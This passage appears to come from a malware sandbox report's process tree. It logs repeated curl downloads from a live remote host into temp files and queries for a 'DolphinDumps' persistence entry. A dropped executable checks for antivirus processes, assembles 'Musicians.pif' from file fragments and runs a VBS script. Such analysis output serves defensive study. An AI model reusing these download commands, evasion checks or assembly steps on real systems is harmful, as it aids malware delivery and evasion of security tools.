        
        PID:4896
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\anhas" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2056
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\anhas" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nypbr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4632
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nypbr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pfkhx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5108
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pfkhx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1952
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:5048
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3212
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4184
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gikxz" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1032
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gikxz" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fpjsu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3220
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fpjsu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pepjc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1672
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pepjc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2608
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1388
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1560
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3296
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4928
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fitoe" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4192
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fitoe" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wbhng" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1520
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wbhng" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4716
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\htxor" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5040
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\htxor" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:5084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1216
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1344
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4704
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4900
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pebst" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4560
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pebst" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ebxre" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:2628
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ebxre" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1568
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wltoy" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1212
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wltoy" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4312
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3856
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2712
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:116
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ktdhi" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4744
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ktdhi" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:5052
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nmahe" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:2436
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nmahe" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nugsp" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2280
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nugsp" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3564
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4352
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3688
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3008
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1240
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rvboq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1120
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rvboq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sjqxi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3556
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sjqxi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\valmf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4756
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\valmf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4804
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2080
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2056
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4168
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iibbu" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1344
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\iibbu" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hnaho" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:5092
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hnaho" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zakdh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3836
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zakdh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zjjra" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=80E79B56FCD3600852CF072C4FE866&zeqb=8&nehq=1"
        5⤵
        
        PID:60
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zjjra" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=80E79B56FCD3600852CF072C4FE866&zeqb=8&nehq=1"
        6⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xgtzn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5068
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xgtzn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4336
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rsdcb" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3524
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rsdcb" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:420
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vxosl" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4184
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vxosl" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lagjy" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UGxhbnNJbnRlbmQuZXhl"
        5⤵
        
        PID:2712
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lagjy" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UGxhbnNJbnRlbmQuZXhl"
        6⤵
        
        PID:2452
    - - C:\Users\Admin\AppData\Local\temp\PlansIntend.exe
        
        "C:\Users\Admin\AppData\Local\temp\PlansIntend.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4740
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Values Values.cmd & Values.cmd
        6⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4648
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4764
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:1068
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        7⤵
        
        PID:728
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 591284
        7⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "ScottishDkSingerCorruption" Feet
        7⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pat + ..\Warcraft + ..\Yeast + ..\Honor + ..\Ws + ..\Botswana + ..\Arrive + ..\Ftp + ..\Sequence + ..\Frontpage X
        7⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\591284\Musicians.pif
        
        Musicians.pif X
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4696
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ezvscvnkqkncvfteszmvklhgqgdju.vbs"
        8⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eczwv" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1672
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\eczwv" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:756
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gymhf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1196
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gymhf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mohjf" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=80E79B56FCD3600852CF072C4FE866&zeqb=8&nehq=2"
        5⤵
        
        PID:4268
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mohjf" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=80E79B56FCD3600852CF072C4FE866&zeqb=8&nehq=2"
        6⤵
        
        PID:768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\locus" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4484
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\locus" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zqjyf" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=80E79B56FCD3600852CF072C4FE866&vprl=2"
        5⤵
        
        PID:3728
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zqjyf" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=80E79B56FCD3600852CF072C4FE866&vprl=2"
        6⤵
        
        PID:2164
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2584
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4248
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3696
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hmqtm" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3192
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hmqtm" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:5048
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sezcn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sezcn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\swlky" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1840
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\swlky" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4464
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3268
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1008
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2380
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oited" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3248
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oited" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pyybu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1780
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pyybu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ishax" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1196
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ishax" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3564
